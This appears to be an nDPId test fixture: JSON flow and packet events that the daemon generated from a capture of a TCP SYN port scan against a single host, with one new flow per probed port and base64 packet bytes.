-00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1894,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsGkEAADQG+jGsEAAIQA2GNIzSAjPdUoMYAAAAAGACBAAyXAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":90,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1895,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAshJIAACsGmOCsEAAIQA2GNIzSAFrdUoMYAAAAAGACEAAoNQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1896,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsjeAAACgGkpKsEAAIQA2GNIzSH5TdUoMYAAAAAGACBAAU+wAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2725,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1897,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsnNwAAC0GfpasEAAIQA2GNIzSCqXdUoMYAAAAAGACCAAl6gAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1898,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAs5ScAACoGOUusEAAIQA2GNIzSATfdUoMYAAAAAGACDAArWAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061257,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061257,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1899,"flow_packet_id":1,"flow_last_seen":1278275061257,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061257,"pkt":"ACYLMQczACWzv5HuCABFAAAsVI8AADIGweOsEAAIQA2GNIzSGgrdUoMYAAAAAGACDAAShQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsNeQAAC0G5Y6sEAAIQA2GNIzTDDjdU4MZAAAAAGACCAAkVAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":465,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1901,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsLcQAACwG7q6sEAAIQA2GNIzTAdHdU4MZAAAAAGACBAAyuwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":42510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1912,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1902,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsg2kAACUGoAmsEAAIQA2GNIzTpg7dU4MZAAAAAGACCACKfQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1108,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1913,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1903,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsEhMAACUGEWCsEAAIQA2GNIzTBFTdU4MZAAAAAGACCAAsOAAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1914,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1904,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsXWQAACwGvw6sEAAIQA2GNIzTA+\/dU4MZAAAAAGACBAAwnQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6646,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1915,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1905,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsIoQAACoG++6sEAAIQA2GNIzTGfbdU4MZAAAAAGACDAASlgAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1916,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1906,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAseo0AACUGqOWsEAAIQA2GNIzTCAHdU4MZAAAAAGACCAAoiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061260,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":85,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1917,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1907,"flow_packet_id":1,"flow_last_seen":1278275061260,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061260,"pkt":"ACYLMQczACWzv5HuCABFAAAsWkgAADkGtSqsEAAIQA2GNIzTAFXdU4MZAAAAAGACCAAwNwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2065,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1918,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1908,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsjOIAACoGkZCsEAAIQA2GNIzTCBHdU4MZAAAAAGACDAAkewAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061275,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061275,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":625,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1919,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1909,"flow_packet_id":1,"flow_last_seen":1278275061275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061275,"pkt":"ACYLMQczACWzv5HuCABFAAAsawEAAC4Gr3GsEAAIQA2GNIzTAnHdU4MZAAAAAGACDAAqGwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061308,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061308,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1920,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1910,"flow_packet_id":1,"flow_last_seen":1278275061308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061308,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/QAADkGW36sEAAIQA2GNIzTCMvdU4MZAAAAAGACCAAnwQAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5225,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1921,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1911,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsePMAACYGqX+sEAAIQA2GNIzTFGndU4MZAAAAAGACDAAYIwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3013,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1912,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAskrwAAC8GhrasEAAIQA2GNIzTC8XdU4MZAAAAAGACEAAcxwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1913,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsiUkAADMGjCmsEAAIQA2GNIzTwAjdU4MZAAAAAGACEABogwAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7920,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1914,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsOr4AADkG1LSsEAAIQA2GNIzTHvDdU4MZAAAAAGACCAARnAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":687,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1925,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1915,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsJLsAADEG8resEAAIQA2GNIzTAq\/dU4MZAAAAAGACCAAt3QAAAgQFtA=="} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3372,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1926,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1916,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsxiMAACoGWE+sEAAIQA2GNIzTDSzdU4MZAAAAAGACDAAfYAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1927,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1917,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAsI\/AAACUG\/4KsEAAIQA2GNIzTAYXdU4MZAAAAAGACCAAvBwAAAgQFtA=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061309,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061309,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32775,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1928,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1918,"flow_packet_id":1,"flow_last_seen":1278275061309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061309,"pkt":"ACYLMQczACWzv5HuCABFAAAswtYAADYGT5ysEAAIQA2GNIzTgAfdU4MZAAAAAGACDACshAAAAgQFtA=="} 